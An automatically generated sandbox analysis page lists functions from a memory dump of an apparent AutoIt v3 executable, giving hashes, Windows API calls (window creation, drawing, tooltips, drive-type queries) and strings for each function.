Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 36f206a6f367e2b67d14590aa5f5254196108062f89b3184612eebfdf07fe49d
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 589147726090A35ADB29463E857407DFFE1DA923A131A0FEFD4F2CA2C5FE149954D620

Function 00BD19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 560e61a9f874e7cffd5bcb729b53e87e1ff9f6ce1ceded687a27fbd9baf5271b
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: D29144722090A35ADB2D467E857403EFFE1DA923A231A0BDFD4F2CA2C5FE24D555D620

Function 00BD7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9062b0d2752ccbb66c243f8a1b01049a63cf6cd46d15330e6ed11371c627022a
Instruction ID: ddf09ff4f9e81d4b76653066efa67ede707619602b5f3438e6c2b2ffe8d0a1f8
Opcode Fuzzy Hash: 9062b0d2752ccbb66c243f8a1b01049a63cf6cd46d15330e6ed11371c627022a
Instruction Fuzzy Hash: 766148712D870A56DA389A288DB6BFEE3D4DF41700F1409DBE846DB381FE159E428359

Function 00BD7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49c05de0f89dda46275b61a2c70282b3872f710f8d32701bd0ca9f2ad3f0c14
Instruction ID: 26f0095acba632e371734e654046a66a28f24172473c1e54d180463baf9309f2
Opcode Fuzzy Hash: d49c05de0f89dda46275b61a2c70282b3872f710f8d32701bd0ca9f2ad3f0c14
Instruction Fuzzy Hash: F76129A16C870957DA389A288895BFEE3DADF41704F1409FBE943DB381FE11ED428355

Function 00BD1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: e0e677061e122147865a818d035b1a2e76fc8f12284a124fba163da82efa0297
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 5E8166726090A319DB6D867D857443EFFE19A923A131A0BDFD4F2CA2D1FE248954E620

Function 00C22046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2297c628d5ad7fb5cd13e84f000604ba9aa5ebb4324e1ed8a552b9e77311304
Instruction ID: fc9f6930b333595804f6b8bc37487cfc6eb64ab3915610a294fbaea270ac9a05
Opcode Fuzzy Hash: c2297c628d5ad7fb5cd13e84f000604ba9aa5ebb4324e1ed8a552b9e77311304
Instruction Fuzzy Hash: D121A5326206218BDB28CE79C82677E73E5A754310F25862EE4A7C77D0DE35A904CB84

Function 00C32ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C32B30
DeleteObject.GDI32(00000000), ref: 00C32B43
DestroyWindow.USER32 ref: 00C32B52
GetDesktopWindow.USER32 ref: 00C32B6D
GetWindowRect.USER32(00000000), ref: 00C32B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C32CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C32CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C32CF8
GetClientRect.USER32(00000000,?), ref: 00C32D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C32D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C32D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C32D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C32D80
GlobalLock.KERNEL32(00000000), ref: 00C32D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C32D98
GlobalUnlock.KERNEL32(00000000), ref: 00C32DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C32DA8
GlobalFree.KERNEL32(00000000), ref: 00C32DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C32DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,00C4FC38,00000000), ref: 00C32DDB
GlobalFree.KERNEL32(00000000), ref: 00C32DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C32E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C32E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C32E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C3303F

Strings

static, xrefs: 00C32D3A, 00C32E91
, xrefs: 00C32FC5
AutoIt v3, xrefs: 00C32CF2
DISPLAY, xrefs: 00C32EA2

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: e656bd8e66e3a843d104741a2033116d6de9d9309eba5f57b950243cefedfbd6
Instruction ID: 3196c345f8607ae08a785e0aba4569ced6599fd6f4450bde6416b7e3bde472d3
Opcode Fuzzy Hash: e656bd8e66e3a843d104741a2033116d6de9d9309eba5f57b950243cefedfbd6
Instruction Fuzzy Hash: 8D025875A10218AFDB14DFA4CC89FAE7BB9FB49710F048158F915AB2A1DB74ED01CB60

Function 00C470D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C4712F
GetSysColorBrush.USER32(0000000F), ref: 00C47160
GetSysColor.USER32(0000000F), ref: 00C4716C
SetBkColor.GDI32(?,000000FF), ref: 00C47186
SelectObject.GDI32(?,?), ref: 00C47195
InflateRect.USER32(?,000000FF,000000FF), ref: 00C471C0
GetSysColor.USER32(00000010), ref: 00C471C8
CreateSolidBrush.GDI32(00000000), ref: 00C471CF
FrameRect.USER32(?,?,00000000), ref: 00C471DE
DeleteObject.GDI32(00000000), ref: 00C471E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00C47230
FillRect.USER32(?,?,?), ref: 00C47262
GetWindowLongW.USER32(?,000000F0), ref: 00C47284

Part of subcall function 00C473E8: GetSysColor.USER32(00000012), ref: 00C47421
Part of subcall function 00C473E8: SetTextColor.GDI32(?,?), ref: 00C47425
Part of subcall function 00C473E8: GetSysColorBrush.USER32(0000000F), ref: 00C4743B
Part of subcall function 00C473E8: GetSysColor.USER32(0000000F), ref: 00C47446
Part of subcall function 00C473E8: GetSysColor.USER32(00000011), ref: 00C47463
Part of subcall function 00C473E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C47471
Part of subcall function 00C473E8: SelectObject.GDI32(?,00000000), ref: 00C47482
Part of subcall function 00C473E8: SetBkColor.GDI32(?,00000000), ref: 00C4748B
Part of subcall function 00C473E8: SelectObject.GDI32(?,?), ref: 00C47498
Part of subcall function 00C473E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00C474B7
Part of subcall function 00C473E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C474CE
Part of subcall function 00C473E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00C474DB

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 7d06a03556ef193df9869c517faea146507b794b1d6d4ab848be0a5dde52caca
Instruction ID: a139c6bdccef6f4a2100ff6fa6726345efb4818b965bf1d7504f127694d8e68c
Opcode Fuzzy Hash: 7d06a03556ef193df9869c517faea146507b794b1d6d4ab848be0a5dde52caca
Instruction Fuzzy Hash: 87A17C76009301EFDB509F60DC88B6F7BA9FB8A320F100B19F962A61B1D771E944DB91

Function 00BC8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00BC8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00C06AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C06AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C06F43

Part of subcall function 00BC8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BC8BE8,?,00000000,?,?,?,?,00BC8BBA,00000000,?), ref: 00BC8FC5

SendMessageW.USER32(?,00001053), ref: 00C06F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C06F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00C06FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00C06FB7

Strings

0, xrefs: 00C06DCF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 82fcc3e93e2b305d0b4924d29d962ff32174740dfedd50a37806a010e9972e0e
Instruction ID: d5d163233f84ee51da57e43b671628563d01cf46dc644352380339c511bdeae5
Opcode Fuzzy Hash: 82fcc3e93e2b305d0b4924d29d962ff32174740dfedd50a37806a010e9972e0e
Instruction Fuzzy Hash: FD129E34601212EFDB25CF24C894BA9B7F5FB45310F1844ADF4A58B2A2CB31ED62DB91

Function 00C32711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00C3273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C3286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C328A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C328B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C32900
GetClientRect.USER32(00000000,?), ref: 00C3290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C32955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C32964
GetStockObject.GDI32(00000011), ref: 00C32974
SelectObject.GDI32(00000000,00000000), ref: 00C32978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C32988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C32991
DeleteDC.GDI32(00000000), ref: 00C3299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C329C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 00C329DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C32A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C32A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00C32A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C32A77
GetStockObject.GDI32(00000011), ref: 00C32A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C32A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C32A97

Strings

msctls_progress32, xrefs: 00C32A13
static, xrefs: 00C3294F, 00C32A71
AutoIt v3, xrefs: 00C328F8
DISPLAY, xrefs: 00C3295A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 0c80a60b038bfc82cd3168135eb5d6a40c44b582b43fd84d6baec81ac036cf80
Instruction ID: 65875e0a790a4aca6d1ea90ca4473ec56aeea7557675546545aea0c67b1e3cc3
Opcode Fuzzy Hash: 0c80a60b038bfc82cd3168135eb5d6a40c44b582b43fd84d6baec81ac036cf80
Instruction Fuzzy Hash: E2B17E75A10215AFEB14DF68CC85FAE7BA9FB09710F008554F915E72A0D770ED00CBA4

Function 00C24ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C24AED
GetDriveTypeW.KERNEL32(?,00C4CB68,?,\\.\,00C4CC08), ref: 00C24BCA
SetErrorMode.KERNEL32(00000000,00C4CB68,?,\\.\,00C4CC08), ref: 00C24D36

Strings

Unknown, xrefs: 00C24BED, 00C24C83
CDROM, xrefs: 00C24BFB
Fibre, xrefs: 00C24CAD
\\.\, xrefs: 00C24B3F
FileBackedVirtual, xrefs: 00C24CEC
USB, xrefs: 00C24CB4
SCSI, xrefs: 00C24C8A
1394, xrefs: 00C24C9F
MMC, xrefs: 00C24CDE
Network, xrefs: 00C24C02
SATA, xrefs: 00C24CD0
SAS, xrefs: 00C24CC9
iSCSI, xrefs: 00C24CC2
Virtual, xrefs: 00C24CE5
ATAPI, xrefs: 00C24C91
PhysicalDrive, xrefs: 00C24B76
SSD, xrefs: 00C24C4A
RAID, xrefs: 00C24CBB
SSA, xrefs: 00C24CA6
ATA, xrefs: 00C24C98
Removable, xrefs: 00C24C10, 00C24C15
RAMDisk, xrefs: 00C24BF4
Fixed, xrefs: 00C24C09

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: ea92a47bfd4dc831f482e50a6a4dfbeeeb4353e48ed8c7cf1bedeaeb72501bf9
Instruction ID: f465a26780d699d09dd7f587535a9799851b9796f3a32258a0dc2b9487dbdda1
Opcode Fuzzy Hash: ea92a47bfd4dc831f482e50a6a4dfbeeeb4353e48ed8c7cf1bedeaeb72501bf9
Instruction Fuzzy Hash: F261C330605616DBCB1DDF2DEA82DBD77A0EB14340B248466F80AABA92DB71DE41DB41

Function 00C473E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00C47421
SetTextColor.GDI32(?,?), ref: 00C47425
GetSysColorBrush.USER32(0000000F), ref: 00C4743B
GetSysColor.USER32(0000000F), ref: 00C47446
CreateSolidBrush.GDI32(?), ref: 00C4744B
GetSysColor.USER32(00000011), ref: 00C47463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C47471
SelectObject.GDI32(?,00000000), ref: 00C47482
SetBkColor.GDI32(?,00000000), ref: 00C4748B
SelectObject.GDI32(?,?), ref: 00C47498
InflateRect.USER32(?,000000FF,000000FF), ref: 00C474B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C474CE
GetWindowLongW.USER32(00000000,000000F0), ref: 00C474DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C4752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C47554
InflateRect.USER32(?,000000FD,000000FD), ref: 00C47572
DrawFocusRect.USER32(?,?), ref: 00C4757D
GetSysColor.USER32(00000011), ref: 00C4758E
SetTextColor.GDI32(?,00000000), ref: 00C47596
DrawTextW.USER32(?,00C470F5,000000FF,?,00000000), ref: 00C475A8
SelectObject.GDI32(?,?), ref: 00C475BF
DeleteObject.GDI32(?), ref: 00C475CA
SelectObject.GDI32(?,?), ref: 00C475D0
DeleteObject.GDI32(?), ref: 00C475D5
SetTextColor.GDI32(?,?), ref: 00C475DB
SetBkColor.GDI32(?,?), ref: 00C475E5

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 5e2eb90133bcf5c2c2aa045b04f5861256efdc15b0d7224d6669a9130cf8fd22
Instruction ID: 2117c526760f7288654135af705afc6a142b2a8926615702f2702a9c74c64dbc
Opcode Fuzzy Hash: 5e2eb90133bcf5c2c2aa045b04f5861256efdc15b0d7224d6669a9130cf8fd22
Instruction Fuzzy Hash: A9616976901218AFDB019FA4DC89BAEBFB9FB09320F114215F915BB2A1D7749A40DF90

Function 00C40FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C41128
GetDesktopWindow.USER32 ref: 00C4113D
GetWindowRect.USER32(00000000), ref: 00C41144
GetWindowLongW.USER32(?,000000F0), ref: 00C41199
DestroyWindow.USER32(?), ref: 00C411B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C411ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C4120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C4121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00C41232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C41245
IsWindowVisible.USER32(00000000), ref: 00C412A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C412BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C412D0
GetWindowRect.USER32(00000000,?), ref: 00C412E8
MonitorFromPoint.USER32(?,?,00000002), ref: 00C4130E
GetMonitorInfoW.USER32(00000000,?), ref: 00C41328
CopyRect.USER32(?,?), ref: 00C4133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 00C413AA

Strings

0, xrefs: 00C410D3
(, xrefs: 00C4131B
tooltips_class32, xrefs: 00C411E6

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: d9f1ca9782618ca9b4bfef95214b923b4534766dfd0e03c5925438e3b3bda1cb
Instruction ID: 8f601213a2e4952ac4eb6234262d0114c615f4322605b2fce315753214d5f600
Opcode Fuzzy Hash: d9f1ca9782618ca9b4bfef95214b923b4534766dfd0e03c5925438e3b3bda1cb
Instruction Fuzzy Hash: 43B19C71604341AFD714DF64C884BAEBBE4FF85350F04895CF9999B2A1CB71E984CB92

Function 00C40241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C402E5
_wcslen.LIBCMT ref: 00C4031F
_wcslen.LIBCMT ref: 00C40389
_wcslen.LIBCMT ref: 00C403F1
_wcslen.LIBCMT ref: 00C40475
